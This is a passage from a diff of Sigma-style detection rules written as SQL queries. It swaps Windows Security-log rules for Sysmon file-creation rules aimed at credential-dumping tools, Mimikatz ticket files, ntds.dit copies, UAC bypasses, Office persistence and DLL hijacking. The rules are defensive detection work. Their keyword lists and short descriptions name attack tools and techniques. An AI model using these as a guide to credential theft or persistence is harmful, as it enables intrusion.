'%\\\\Schtasks-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-DCShadowPermissions.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-MacAttribute.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-RemotePSRemoting.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-RemoteWMI.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-Wallpaper.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Show-TargetScreen.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Speak.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start-CaptureServer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start-WebcamRecorder.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\StringToBase64.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\TexttoExe.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\VolumeShadowCopyTools.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinPwn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WSUSpendu.ps1' ESCAPE '\\') OR (TargetFilename LIKE '%Invoke-Sharp%' ESCAPE '\\' AND TargetFilename LIKE '%.ps1' ESCAPE '\\')))" ], - "filename": "win_security_exploit_cve_2021_1675_printspooler_security.yml" + "filename": "file_event_win_powershell_exploit_scripts.yml" }, { - "title": "Invoke-Obfuscation VAR+ Launcher - Security", - "id": "dcf2db1f-f091-425b-a821-c05875b8925a", - "status": "experimental", - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "title": "Octopus Scanner Malware", + "id": "805c55d9-31e6-4846-9878-c34c75054fe9", + "status": "test", + "description": "Detects Octopus Scanner Malware.", + "author": "NVISO", + "tags": [ + "attack.t1195", + "attack.t1195.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%\"set%' ESCAPE '\\' AND ServiceFileName LIKE '%-f%' ESCAPE '\\' AND (ServiceFileName LIKE '%/c%' ESCAPE '\\' OR ServiceFileName LIKE '%/r%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Cache134.dat' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\ExplorerSync.db' ESCAPE '\\'))" ], - "filename": "win_security_invoke_obfuscation_var_services_security.yml" + "filename": "file_event_win_mal_octopus_scanner.yml" }, { - "title": "Service Installed By Unusual Client - Security", - "id": "c4e92a97-a9ff-4392-9d2d-7a4c642768ca", + "title": "Potential RipZip Attack on Startup Folder", + "id": "a6976974-ea6f-4e97-818e-ea08625c52cb", "status": "experimental", - "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", - "author": "Tim Rauch", + "description": "Detects a phishing attack which expands a ZIP file containing a malicious shortcut.\nIf the victim expands the ZIP file via the explorer process, then the explorer process expands the malicious ZIP file and drops a malicious shortcut redirected to a backdoor into the Startup folder.\nAdditionally, the file name of the malicious shortcut in Startup folder contains {0AFACED1-E828-11D1-9187-B532F1E9575D} meaning the folder shortcut operation.\n", + "author": "Greg (rule)", "tags": [ - "attack.privilege_escalation", - "attack.t1543" + "attack.persistence", + "attack.t1547" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ClientProcessId = '0' OR ParentProcessId = '0'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup%' ESCAPE '\\' AND TargetFilename LIKE '%.lnk.{0AFACED1-E828-11D1-9187-B532F1E9575D}%' ESCAPE '\\' AND Image LIKE '%\\\\explorer.exe' ESCAPE '\\')" ], - "filename": "win_security_service_installation_by_unusal_client.yml" + "filename": "file_event_win_ripzip_attack.yml" }, { - "title": "SAM Registry Hive Handle Request", - "id": "f8748f2c-89dc-4d95-afb0-5a2dfdbad332", + "title": "Potential Persistence Via Microsoft Office Add-In", + "id": "8e1cb247-6cf6-42fa-b440-3f27d57e9936", "status": "test", - "description": "Detects handles requested to SAM registry hive", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects potential persistence activity via startup add-ins that load when Microsoft Office starts (.wll/.xll are simply .dll fit for Word or Excel).", + "author": "NVISO", "tags": [ - "attack.discovery", - "attack.t1012", - "attack.credential_access", - "attack.t1552.002" + "attack.persistence", + "attack.t1137.006" ], "falsepositives": [ - "Unknown" + "Legitimate add-ins" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4656' AND ObjectType = 'Key' AND ObjectName LIKE '%\\\\SAM' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\Microsoft\\\\Word\\\\Startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.wll' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Microsoft\\\\Excel\\\\Startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.xll' ESCAPE '\\') OR (TargetFilename LIKE '%Microsoft\\\\Excel\\\\XLSTART\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.xlam' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Microsoft\\\\Addins\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.xlam' ESCAPE '\\' OR TargetFilename LIKE '%.xla' ESCAPE '\\' OR TargetFilename LIKE '%.ppam' ESCAPE '\\'))))" ], - "filename": "win_security_sam_registry_hive_handle_request.yml" + "filename": "file_event_win_office_addin_persistence.yml" }, { - "title": "DCOM InternetExplorer.Application Iertutil DLL Hijack - Security", - "id": "c39f0c81-7348-4965-ab27-2fde35a1b641", + "title": "UAC Bypass Using Windows Media Player - File", + "id": "68578b43-65df-4f81-9a9b-92f32711a951", "status": "test", - "description": "Detects a threat actor creating a file named `iertutil.dll` in the `C:\\Program Files\\Internet Explorer\\` directory over the network for a DCOM InternetExplorer DLL Hijack scenario.", - "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", + "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1021.003" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND RelativeTargetName LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\OskSupport.dll' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\DllHost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\')))" ], - "filename": "win_security_dcom_iertutil_dll_hijack.yml" + "filename": "file_event_win_uac_bypass_wmp.yml" }, { - "title": "Kerberos Manipulation", - "id": "f7644214-0eb0-4ace-9455-331ec4c09253", - "status": "test", - "description": "This method triggers on rare Kerberos Failure Codes caused by manipulations of Kerberos messages", - "author": "Florian Roth (Nextron Systems)", + "title": "Office Template Creation", + "id": "0e20c89d-2264-44ae-8238-aeeaba609ece", + "status": "experimental", + "description": "Detects creation of template files for Microsoft Office from outside Office", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1212" + "attack.persistence", + "attack.t1137" ], "falsepositives": [ - "Faulty legacy applications" + "Loading a user environment from a backup or a domain controller", + "Synchronization of templates" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('675', '4768', '4769', '4771') AND FailureCode IN ('0x9', '0xA', '0xB', '0xF', '0x10', '0x11', '0x13', '0x14', '0x1A', '0x1F', '0x21', '0x22', '0x23', '0x24', '0x26', '0x27', '0x28', '0x29', '0x2C', '0x2D', '0x2E', '0x2F', '0x31', '0x32', '0x3E', '0x3F', '0x40', '0x41', '0x43', '0x44'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((TargetFilename LIKE '%.dot' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.doc' ESCAPE '\\' OR TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.docx' ESCAPE '\\' OR TargetFilename LIKE '%.rtf' ESCAPE '\\') AND TargetFilename LIKE '%\\\\Microsoft\\\\Word\\\\Startup%' ESCAPE '\\') OR ((TargetFilename LIKE '%.xlt' ESCAPE '\\' OR TargetFilename LIKE '%.xltm' ESCAPE '\\' OR TargetFilename LIKE '%.xls' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx' ESCAPE '\\') AND TargetFilename LIKE '%\\\\Microsoft\\\\Excel\\\\Startup%' ESCAPE '\\')) AND NOT ((Image LIKE '%\\\\WINWORD.exe' ESCAPE '\\' OR Image LIKE '%\\\\EXCEL.exe' ESCAPE '\\')))" ], - "filename": "win_security_susp_kerberos_manipulation.yml" + "filename": "file_event_win_word_template_creation.yml" }, { - "title": "Invoke-Obfuscation Via Use MSHTA - Security", - "id": "9b8d9203-4e0f-4cd9-bb06-4cc4ea6d0e9a", - "status": "experimental", - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "Mimikatz Kirbi File Creation", + "id": "9e099d99-44c2-42b6-a6d8-54c3545cab29", + "status": "test", + "description": "Detects the creation of files created by mimikatz such as \".kirbi\", \"mimilsa.log\", etc.", + "author": "Florian Roth (Nextron Systems), David ANDRE", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1558" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%mshta%' ESCAPE '\\' AND ServiceFileName LIKE '%vbscript:createobject%' ESCAPE '\\' AND ServiceFileName LIKE '%.run%' ESCAPE '\\' AND ServiceFileName LIKE '%window.close%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%.kirbi' ESCAPE '\\' OR TargetFilename LIKE '%mimilsa.log' ESCAPE '\\'))" ], - "filename": "win_security_invoke_obfuscation_via_use_mshta_services_security.yml" + "filename": "file_event_win_hktl_mimikatz_files.yml" }, { - "title": "PetitPotam Suspicious Kerberos TGT Request", - "id": "6a53d871-682d-40b6-83e0-b7c1a6c4e3a5", + "title": "Legitimate Application Dropped Executable", + "id": "f0540f7e-2db3-4432-b9e0-3965486744bc", "status": "experimental", - "description": "Detect suspicious Kerberos TGT requests.\nOnce an attacer obtains a computer certificate by abusing Active Directory Certificate Services in combination with PetitPotam, the next step would be to leverage the certificate for malicious purposes.\nOne way of doing this is to request a Kerberos Ticket Granting Ticket using a tool like Rubeus.\nThis request will generate a 4768 event with some unusual fields depending on the environment.\nThis analytic will require tuning, we recommend filtering Account_Name to the Domain Controller computer accounts.\n", - "author": "Mauricio Velazco, Michael Haag", + "description": "Detects programs on a Windows system that should not write executables to disk", + "author": "frack113, Florian Roth", "tags": [ - "attack.credential_access", - "attack.t1187" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "False positives are possible if the environment is using certificates for authentication. We recommend filtering Account_Name to the Domain Controller computer accounts." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4768' AND TargetUserName LIKE '%$' ESCAPE '\\' AND CertThumbprint LIKE '%' ESCAPE '\\') AND NOT ((IpAddress = '::1') OR (CertThumbprint = '')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR Image LIKE '%\\\\visio.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordview.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR Image LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR Image LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR Image LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR Image LIKE '%\\\\finger.exe' ESCAPE '\\' OR Image LIKE '%\\\\notepad.exe' ESCAPE '\\' OR Image LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR Image LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.ocx' ESCAPE '\\'))" ], - "filename": "win_security_petitpotam_susp_tgt_request.yml" + "filename": "file_event_win_legitimate_app_dropping_exe.yml" }, { - "title": "Important Scheduled Task Deleted/Disabled", - "id": "7595ba94-cf3b-4471-aa03-4f6baa9e5fad", - "status": "experimental", - "description": "Detects when adversaries stop services or processes by deleting or disabling their respective scheduled tasks in order to conduct data destructive activities", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "UAC Bypass Abusing Winsat Path Parsing - File", + "id": "155dbf56-e0a4-4dd0-8905-8a98705045e8", + "status": "test", + "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.execution", + "attack.defense_evasion", "attack.privilege_escalation", - "attack.persistence", - "attack.t1053.005" + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4699', '4701') AND (TaskName LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\Schedule%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\')) AND NOT ((EventID = '4699' AND SubjectUserName LIKE '%$' ESCAPE '\\' AND TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winsat.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winmm.dll' ESCAPE '\\'))" ], - "filename": "win_security_susp_scheduled_task_delete_or_disable.yml" + "filename": "file_event_win_uac_bypass_winsat.yml" }, { - "title": "Remote PowerShell Sessions Network Connections (WinRM)", - "id": "13acf386-b8c6-4fe0-9a6e-c4756b974698", + "title": "Cred Dump Tools Dropped Files", + "id": "8fbf3271-1ef6-4e94-8210-03c2317947f6", "status": "test", - "description": "Detects basic PowerShell Remoting (WinRM) by monitoring for network inbound connections to ports 5985 OR 5986", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Files with well-known filenames (parts of credential dump software or files produced by them) creation", + "author": "Teymur Kheirkhabarov, oscd.community", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.003", + "attack.t1003.004", + "attack.t1003.005" ], "falsepositives": [ - "Legitimate use of remote PowerShell execution" + "Legitimate Administrator using tool for password recovery" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5156' AND DestPort IN ('5985', '5986') AND LayerRTID = '44')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\pwdump%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\kirbi%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwhashes%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wce\\_ccache%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wce\\_krbtkts%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fgdump-log%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\test.pwd' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsremora64.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsremora.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fgexec.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wceaux.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SECURITY.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SYSTEM.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\NTDS.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DumpExt.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DumpSvc.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cachedump64.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cachedump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pstgdump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\servpw.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\servpw64.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwdump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Dumpy.exe' ESCAPE '\\')))" ], - "filename": "win_security_remote_powershell_session.yml" + "filename": "file_event_win_cred_dump_tools_dropped_files.yml" }, { - "title": "Generic Password Dumper Activity on LSASS", - "id": "4a1b6da0-d94f-4fc3-98fc-2d9cb9e5ee76", - "status": "experimental", - "description": "Detects process handle on LSASS process with certain access mask", - "author": "Roberto Rodriguez, Teymur Kheirkhabarov, Dimitrios Slamaris, Mark Russinovich, Aleksey Potapov, oscd.community (update)", + "title": "Creation Exe for Service with Unquoted Path", + "id": "8c3c76ca-8f8b-4b1d-aaf3-81aebcd367c9", + "status": "test", + "description": "Adversaries may execute their own malicious payloads by hijacking vulnerable file path references.\nAdversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.\n", + "author": "frack113", "tags": [ - "attack.credential_access", - "car.2019-04-004", - "attack.t1003.001" + "attack.persistence", + "attack.t1547.009" ], "falsepositives": [ - "Legitimate software accessing LSASS process for legitimate reason; update the whitelist with it" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4656' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (AccessMask LIKE '%0x40%' ESCAPE '\\' OR AccessMask LIKE '%0x1400%' ESCAPE '\\' OR AccessMask LIKE '%0x100000%' ESCAPE '\\' OR AccessMask LIKE '%0x1410%' ESCAPE '\\' OR AccessMask LIKE '%0x1010%' ESCAPE '\\' OR AccessMask LIKE '%0x1438%' ESCAPE '\\' OR AccessMask LIKE '%0x143a%' ESCAPE '\\' OR AccessMask LIKE '%0x1418%' ESCAPE '\\' OR AccessMask LIKE '%0x1f0fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f1fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f2fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f3fff%' ESCAPE '\\')) OR (EventID = '4663' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (AccessList LIKE '%4484%' ESCAPE '\\' OR AccessList LIKE '%4416%' ESCAPE '\\'))) AND NOT (((ProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\taskmgr.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\lsm.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\minionhost.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\VsTskMgr.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\GamingServices.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MRT.exe' ESCAPE '\\' OR ProcessName LIKE '%RtkAudUService64' ESCAPE '\\') AND (ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysWow64\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysNative\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\')) OR (ProcessName LIKE 'C:\\\\Program Files%' ESCAPE '\\') OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\taskhostw.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\CCM\\\\CcmExec.exe' ESCAPE '\\')) OR (ProcessName LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent-sc\\\\aurora\\\\%' ESCAPE '\\' AND ProcessName LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE '%\\\\x64\\\\SCENARIOENGINE.EXE' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND ProcessName LIKE '%\\\\avira\\_system\\_speedup.tmp' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\program.exe' ESCAPE '\\')" ], - "filename": "win_security_susp_lsass_dump_generic.yml" + "filename": "file_event_win_creation_unquoted_service_path.yml" }, { - "title": "Credential Dumping Tools Service Execution - Security", - "id": "f0d1feba-4344-4ca9-8121-a6c97bd6df52", - "status": "test", - "description": "Detects well-known credential dumping tools execution via service execution events", - "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", + "title": "Suspicious Process Writes Ntds.dit", + "id": "11b1ed55-154d-4e82-8ad7-83739298f720", + "status": "experimental", + "description": "Detects suspicious processes that write (copy) a Active Directory database (ntds.dit) file", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.execution", - "attack.t1003.001", "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005", - "attack.t1003.006", - "attack.t1569.002", - "attack.s0005" + "attack.t1003.003" ], "falsepositives": [ - "Legitimate Administrator using credential dumping tool for password recovery" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName LIKE '%fgexec%' ESCAPE '\\' OR ServiceFileName LIKE '%dumpsvc%' ESCAPE '\\' OR ServiceFileName LIKE '%cachedump%' ESCAPE '\\' OR ServiceFileName LIKE '%mimidrv%' ESCAPE '\\' OR ServiceFileName LIKE '%gsecdump%' ESCAPE '\\' OR ServiceFileName LIKE '%servpw%' ESCAPE '\\' OR ServiceFileName LIKE '%pwdump%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\ntds.dit' ESCAPE '\\' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsl.exe' ESCAPE '\\'))" ], - "filename": "win_security_mal_creddumper.yml" + "filename": "file_event_win_susp_ntds_dit.yml" }, { - "title": "Win Susp Computer Name Containing Samtheadmin", - "id": "39698b3f-da92-4bc6-bfb5-645a98386e45", + "title": "Suspicious Get-Variable.exe Creation", + "id": "0c3fac91-5627-46e8-a6a8-a0d7b9b8ae1b", "status": "experimental", - "description": "Detects suspicious computer name samtheadmin-{1..100}$ generated by hacktool", - "author": "elhoim", + "description": "Get-Variable is a valid PowerShell cmdlet\nWindowsApps is by default in the path where PowerShell is executed.\nSo when the Get-Variable command is issued on PowerShell execution, the system first looks for the Get-Variable executable in the path and executes the malicious binary instead of looking for the PowerShell cmdlet.\n", + "author": "frack113", "tags": [ - "cve.2021.42278", - "cve.2021.42287", "attack.persistence", - "attack.privilege_escalation", - "attack.t1078" + "attack.t1546", + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((SamAccountName LIKE 'SAMTHEADMIN-%' ESCAPE '\\' AND SamAccountName LIKE '%$' ESCAPE '\\') OR (TargetUserName LIKE 'SAMTHEADMIN-%' ESCAPE '\\' AND TargetUserName LIKE '%$' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%Local\\\\Microsoft\\\\WindowsApps\\\\Get-Variable.exe' ESCAPE '\\')" ], - "filename": "win_security_susp_computer_name.yml" + "filename": "file_event_win_susp_get_variable.yml" }, { - "title": "Invoke-Obfuscation Obfuscated IEX Invocation - Security", - "id": "fd0f5778-d3cb-4c9a-9695-66759d04702a", + "title": "DLL Search Order Hijackig Via Additional Space in Path", + "id": "b6f91281-20aa-446a-b986-38a92813a18f", "status": "experimental", - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references", - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "description": "Detects when an attacker create a similar folder structure to windows system folders such as (Windows, Program Files...)\nbut with a space in order to trick DLL load search order and perform a \"DLL Search Order Hijacking\" attack\n", + "author": "frack113, Nasreddine Bencherchali", "tags": [ + "attack.persistence", + "attack.privilege_escalation", "attack.defense_evasion", - "attack.t1027" + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName REGEXP 